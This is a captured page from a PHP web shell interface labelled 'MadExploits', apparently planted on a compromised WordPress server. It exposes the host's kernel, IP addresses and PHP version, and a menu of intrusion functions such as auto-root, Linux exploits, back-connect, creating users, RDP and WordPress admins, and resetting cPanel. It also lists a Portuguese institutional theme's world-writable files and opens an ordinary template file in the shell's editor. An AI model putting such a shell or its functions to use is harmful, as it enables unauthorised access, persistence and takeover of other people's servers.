Linux 700ba4e1d92d 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Apache/2.4.67 (Debian)
: 172.18.0.2 | : 216.73.217.30
Cant Read [ /etc/named.conf ]
8.2.31
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
wp-content /
themes /
mpcma-theme /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxrwx
template-parts
[ DIR ]
drwxrwxrwx
.DS_Store
6
KB
-rwxrwxrwx
archive-ato_normativo.php
12.96
KB
-rwxrwxrwx
archive-parecer.php
1.24
KB
-rwxrwxrwx
footer.php
3.58
KB
-rwxrwxrwx
front-page.php
7.12
KB
-rwxrwxrwx
functions.php
9.54
KB
-rwxrwxrwx
header.php
2.19
KB
-rwxrwxrwx
home.php
1.27
KB
-rwxrwxrwx
index.php
7.07
KB
-rwxrwxrwx
page-acesso-a-informacao.php
3.61
KB
-rwxrwxrwx
page-contato.php
3.53
KB
-rwxrwxrwx
page-institucional.php
3.79
KB
-rwxrwxrwx
page-mapa-do-site.php
2.51
KB
-rwxrwxrwx
page.php
693
B
-rwxrwxrwx
screenshot-readme.txt
73
B
-rwxrwxrwx
single.php
876
B
-rwxrwxrwx
style.css
499
B
-rwxrwxrwx
taxonomy-tipo_ato.php
2.64
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : taxonomy-tipo_ato.php
<?php get_header(); ?> <?php $term = get_queried_object(); ?> <div class="page-hero"> <h1><?php echo esc_html($term->name); ?></h1> <p class="breadcrumb"> <a href="<?php echo home_url(); ?>">Início</a> › <a href="<?php echo esc_url( get_post_type_archive_link('ato_normativo') ); ?>">Atos Normativos</a> › <?php echo esc_html($term->name); ?> </p> </div> <div class="page-content"> <div class="section-page-header"> <svg viewBox="0 0 24 24"><path d="M12 3L1 9l11 6 9-4.91V17h2V9L12 3zM5 13.18v4L12 21l7-3.82v-4L12 17l-7-3.82z"/></svg> <h2><?php echo esc_html(strtoupper($term->name)); ?></h2> </div> <div class="atos-layout"> <div> <form class="atos-search" method="get" action="<?php echo esc_url(home_url('/')); ?>"> <input type="text" name="s" placeholder="Buscar..." value="<?php echo esc_attr(get_search_query()); ?>"> <input type="hidden" name="post_type" value="ato_normativo"> <button type="submit" style="background:none;border:none;cursor:pointer;"> <svg viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27A6.471 6.471 0 0 0 16 9.5 6.5 6.5 0 1 0 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/></svg> </button> </form> <div class="atos-sidebar"> <?php $tipos = get_terms(['taxonomy' => 'tipo_ato', 'hide_empty' => false]); foreach ($tipos as $tipo) : $active = ($tipo->slug === $term->slug) ? 'style="opacity:0.7;"' : ''; ?> <a class="atos-btn" href="<?php echo esc_url(get_term_link($tipo)); ?>" <?php echo $active; ?>> <?php echo esc_html(strtoupper($tipo->name)); ?> </a> <?php endforeach; ?> </div> </div> <div> <div class="recentes-title"><?php echo esc_html(strtoupper($term->name)); ?></div> <?php if ( have_posts() ) : while ( have_posts() ) : the_post(); $arquivo = get_post_meta(get_the_ID(), 'arquivo_url', true); ?> <div class="ato-recente"> <div> <h4><?php the_title(); ?></h4> <p><?php echo wp_trim_words(get_the_excerpt(), 12); ?></p> <p class="data"><?php echo get_the_date('d/m/Y'); ?></p> </div> <?php if ($arquivo) : ?> <a class="download-btn" href="<?php echo esc_url($arquivo); ?>" target="_blank" title="Baixar">⬇</a> <?php endif; ?> </div> <?php endwhile; else : ?> <p style="color:#888;font-size:0.9rem;">Nenhum item encontrado nesta categoria.</p> <?php endif; ?> </div> </div> </div> <?php get_footer(); ?>
Close